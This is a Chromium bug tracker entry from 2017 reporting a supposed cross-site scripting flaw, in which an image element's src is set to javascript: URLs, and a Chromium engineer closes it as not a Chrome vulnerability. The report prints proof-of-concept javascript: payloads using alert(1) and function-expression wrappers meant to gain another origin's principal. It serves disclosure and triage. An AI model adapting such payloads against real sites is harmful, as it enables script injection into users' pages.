Issue metadata
Sign in to add a comment
|
XSS via img.src to javascript:URL
Reported by
mishra.d...@gmail.com,
Mar 7 2017
|
||||||||||||||||||
Issue description
UserAgent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Steps to reproduce the problem:
1. Get an image element (I) that was created in a document that was loaded in
another window (W).
2. Load an other domain page (X) into W.
3. Set I.src to a javascript: URL.
A script is executed in the context of X, and its principal is a null principal
(and, on branches, it's a codebase principal whose URI is "javascript:...").
This means that the script cannot directly access properties of the X's global
scope. But the script can create a function that has the X's principal by
using a named function expression or a nested function.
For Example:
img.src = "javascript:alert(1)";
-> Permission denied to get property Window.alert
img.src = "javascript:(function() { alert(1) }).call('')";
-> Permission denied to get property Window.alert
img.src = "javascript:(function f() { alert(1) }).call('')";
-> ok
img.src = "javascript:(function() {\
(function() { alert(1) }).call(''); }).call('')";
-> ok
What is the expected behavior?
What went wrong?
Demo URL : http://hackies.in/xss.html
Did this work before? N/A
Chrome version: 57.0.2987.88 (Official Build) beta (64-bit) Channel: beta
OS Version: V8 5.7.492.60
Flash Version: Shockwave Flash 24.0 r0
,
Mar 7 2017
The "repro" file does not represent the issue described. There's no reason to believe Chrome has a vulnerability here.
,
Jun 14 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Mar 7 2017